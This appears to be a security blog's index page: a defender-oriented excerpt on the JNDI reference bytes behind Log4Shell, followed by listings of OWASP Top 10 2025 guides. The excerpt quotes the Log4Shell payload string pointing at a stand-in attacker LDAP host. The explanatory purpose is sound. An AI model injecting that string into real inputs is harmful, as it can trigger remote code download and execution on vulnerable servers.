Hand-rolling the JNDI Reference: what the JVM actually deserializes

Quick note before we start: this is about the wire format, for defenders and people doing authorized testing. There’s no turnkey exploit here, no gadget chain, nothing you can copy-paste to pop a box. The point is to know what the bytes look like so you can spot them.

You’ve seen the Log4Shell string a hundred times:

${jndi:ldap://attacker.example/a}

And you’ve probably read the stock explanation that goes with it: the server does a JNDI lookup, the attacker’s LDAP server hands back a reference to a remote class, and the JVM downloads and runs it. ...

July 1, 2026 · Carl Sampson

OWASP A05: Injection Prevention Guide 2025

🛡️ OWASP Top 10 2025 Series: Complete guides to modern web application security vulnerabilities

📚 Complete Guide
OWASP Top 10 2025: Complete Developer Guide. Comprehensive overview of all vulnerabilities, rankings, and modern threat landscape

🎯 Individual Vulnerability Guides
A01: Broken Access Control (Includes SSRF)
A02: Security Misconfiguration (Jumped to #2)
A03: Software Supply Chain Failures (New in 2025)
A04: Cryptographic Failures
A05: Injection
A06: Vulnerable Components (Coming Next)
A07: Authentication Failures (Coming Soon)
A08: Integrity Failures (Coming Soon)
A09: Logging & Monitoring (Coming Soon)
A10: Exception Handling (Coming Soon)

👨‍💻 Written by Carl Sampson • Security researcher with 15+ years experience • OWASP Indianapolis Chapter founder ...

June 30, 2026 · Carl Sampson

OWASP A04: Cryptographic Failures Guide 2025

June 30, 2026 · Carl Sampson

OWASP A03: Software Supply Chain Failures Guide 2025

June 30, 2026 · Carl Sampson

OWASP A02: Security Misconfiguration Guide 2025

May 5, 2026 · Carl Sampson